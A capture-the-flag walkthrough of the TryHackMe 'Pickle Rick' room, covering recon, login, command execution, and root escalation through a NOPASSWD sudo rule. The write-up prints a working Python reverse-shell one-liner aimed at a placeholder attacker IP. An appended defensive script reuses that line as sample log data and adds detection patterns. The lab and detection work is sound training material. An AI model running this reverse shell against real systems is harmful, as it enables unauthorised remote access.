Pickle Rick - THM
Recon:
Let’s start by doing an nmap scan on the given machine to see the open ports.
Navigating to port 80 and looking at the page source, we get the username: R1ckRul3s.
On running gobuster, we can see that we have a directory named assets. Let’s go there.
Let’s also go to /robots.txt and see what we can find.
Gobuster results:
Let’s try to log in with the username and the string we found as the password.
We are met with a panel where we can execute commands, but ‘cat’ doesn’t work!
Using tac on clue.txt gives the following output:
Look around the file system for the other ingredient.
tac Sup3rS3cretPickl3Ingred.txt
Running this will give you the first ingredient as output.
Now, let’s get a reverse shell on the system using a python3 one-liner:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
There we go, we have the reverse shell.
Make the shell interactive using:
/bin/bash -ki
Get linpeas.sh onto the box and run it in this shell; you’ll see that sudo can run any command/tool without a password. Alternatively, run sudo -l to see the permissions.
Run:
sudo bash
to get root access, and voila. Search for the second and third ingredients by navigating to the user home directories.
John Hammond has a really cool project which makes it easier to transfer files from your system to the machine without having to set up netcat and the like; check it out: https://github.com/JohnHammond/poor-mans-pentest/blob/master/upload_file_nc.sh .
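As an added defender-side example (not part of the original writeup): the two weaknesses this box turns on are a web-application account that can spawn an interpreter reverse shell and an interactive shell, and a sudoers rule granting NOPASSWD for every command. The script below flags both in a constructed process-execution log and a constructed sudoers fragment; the log format, the www-data/alice accounts and the sudoers lines are assumptions made for illustration.

```python
import re

# Constructed process-execution records (user + command line), not real logs.
SAMPLE_EXEC_LOG = [
    "user=www-data cmd=tac clue.txt",
    "user=www-data cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKING-IP\",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "user=www-data cmd=/bin/bash -ki",
    "user=www-data cmd=sudo bash",
    "user=alice cmd=python -c 'print(1)'",
]
# Constructed sudoers fragment; the www-data line is the NOPASSWD: ALL misconfiguration.
SAMPLE_SUDOERS = """\
root     ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: ALL   # any command as root, no password
alice    ALL=(ALL) NOPASSWD: /usr/bin/systemctl restart nginx
"""

LINE_RE = re.compile(r"^user=(\S+) cmd=(.*)$")
SUDO_ALL_RE = re.compile(r"^(\S+)\s+\S+=\([^)]*\)\s+NOPASSWD:\s*ALL$")
# Fingerprint of an interpreter reverse shell: socket connect + fd duplication + shell.
REVSHELL_PARTS = ("socket", "connect(", "dup2", "/bin/sh")
SHELL_BINS = {"sh", "bash", "dash", "zsh", "sudo"}  # the web user should spawn none of these

def is_reverse_shell(cmd):
    return all(part in cmd for part in REVSHELL_PARTS)

def is_web_user_shell(user, cmd):
    parts = cmd.split()
    argv0 = parts[0].rsplit("/", 1)[-1] if parts else ""  # basename of the program
    return user == "www-data" and argv0 in SHELL_BINS

def find_suspicious_execs(lines):
    """Return (kind, user, cmd) for each record that trips a rule."""
    hits = []
    for m in filter(None, map(LINE_RE.match, lines)):
        user, cmd = m.groups()
        if is_reverse_shell(cmd):
            hits.append(("reverse_shell", user, cmd))
        elif is_web_user_shell(user, cmd):
            hits.append(("web_user_shell", user, cmd))
    return hits

def find_nopasswd_all(sudoers_text):
    """Return users/groups granted NOPASSWD for ALL commands (comments stripped)."""
    stripped = (raw.split("#", 1)[0].strip() for raw in sudoers_text.splitlines())
    return [m.group(1) for m in map(SUDO_ALL_RE.match, stripped) if m]
```

On a real host the sudoers check is the cheaper fix: the privilege escalation here needs nothing beyond that one rule, so auditing /etc/sudoers and /etc/sudoers.d for NOPASSWD: ALL removes it outright.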
Keep hackin!